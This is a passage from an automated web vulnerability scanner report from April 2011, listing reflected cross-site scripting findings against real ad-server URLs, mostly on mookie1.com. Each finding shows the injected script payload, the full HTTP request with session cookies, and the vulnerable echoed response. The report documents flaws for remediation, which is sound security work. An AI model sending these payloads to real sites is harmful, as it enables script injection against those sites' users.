<form method="post" action="http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js5e502\"><script>alert(1)</script>87deeb2ec4f?ver=20101110&amp;_login=ba7f702b91">
...[SNIP]...

3.48. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd65"><script>alert(1)</script>dfef0ede538 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMdbd65"><script>alert(1)</script>dfef0ede538/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMdbd65"><script>alert(1)</script>dfef0ede538/2010DM/467996617/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.49. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48cc0"><script>alert(1)</script>b9e470def13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM48cc0"><script>alert(1)</script>b9e470def13/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM48cc0"><script>alert(1)</script>b9e470def13/1058946340/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><
...[SNIP]...

3.50. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d4f"><script>alert(1)</script>91bcd1e71d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/12086108130@x23a8d4f"><script>alert(1)</script>91bcd1e71d8?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1086585598/x23a8d4f"><script>alert(1)</script>91bcd1e71d8/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><
...[SNIP]...

3.51. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [USNetwork/Dominos_11Q2_247_CPC_728 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79e43"-alert(1)-"2c71c5674a2 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_72879e43"-alert(1)-"2c71c5674a2 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2438
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_72879e43"-alert(1)-"2c71c5674a2";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

3.52. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b86c4"-alert(1)-"968eecc14d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728&b86c4"-alert(1)-"968eecc14d7=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:32 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2441
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_728&b86c4"-alert(1)-"968eecc14d7=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

3.53. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6939f"><script>alert(1)</script>d229212c062 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM6939f"><script>alert(1)</script>d229212c062/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM6939f"><script>alert(1)</script>d229212c062/2010DM/563051834/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.54. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7757"><script>alert(1)</script>67578923dc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMd7757"><script>alert(1)</script>67578923dc4/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:30 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMd7757"><script>alert(1)</script>67578923dc4/1694518381/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><
...[SNIP]...

3.55. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db149"><script>alert(1)</script>45420a5298d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1377241392@x23db149"><script>alert(1)</script>45420a5298d?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/783297670/x23db149"><script>alert(1)</script>45420a5298d/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.56. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [USNetwork/Dominos_11Q2_247_CPC_728 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bcfc"-alert(1)-"38d19f0405 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_7287bcfc"-alert(1)-"38d19f0405 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2437
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_7287bcfc"-alert(1)-"38d19f0405";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

3.57. http://dm.de.mookie1.com/2/B3DM/2010DM/1377241392@x23 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1377241392@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bee7"-alert(1)-"d96185b3a49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1377241392@x23?USNetwork/Dominos_11Q2_247_CPC_728&5bee7"-alert(1)-"d96185b3a49=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11060627171@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242610

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:04:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2441
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_728&5bee7"-alert(1)-"d96185b3a49=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

3.58. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37a88"><script>alert(1)</script>4134ea3c517 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM37a88"><script>alert(1)</script>4134ea3c517/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM37a88"><script>alert(1)</script>4134ea3c517/2010DM/818904836/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.59. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bb87"><script>alert(1)</script>cb041db047f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM1bb87"><script>alert(1)</script>cb041db047f/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM1bb87"><script>alert(1)</script>cb041db047f/1515177406/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><
...[SNIP]...

3.60. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec8df"><script>alert(1)</script>c890c99deb6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1548248067@x23ec8df"><script>alert(1)</script>c890c99deb6?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/120922881/x23ec8df"><script>alert(1)</script>c890c99deb6/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.61. http://dm.de.mookie1.com/2/B3DM/2010DM/1548248067@x23 [USNetwork/Dominos_11Q2_247_CPC_728 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1548248067@x23

Issue detail

The value of the USNetwork/Dominos_11Q2_247_CPC_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f5f"-alert(1)-"2e2171ccfc5 was submitted in the USNetwork/Dominos_11Q2_247_CPC_728 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1548248067@x23?USNetwork/Dominos_11Q2_247_CPC_72812f5f"-alert(1)-"2e2171ccfc5 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2438
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/;httponly

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/Dominos_11Q2_247_CPC_72812f5f"-alert(1)-"2e2171ccfc5";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

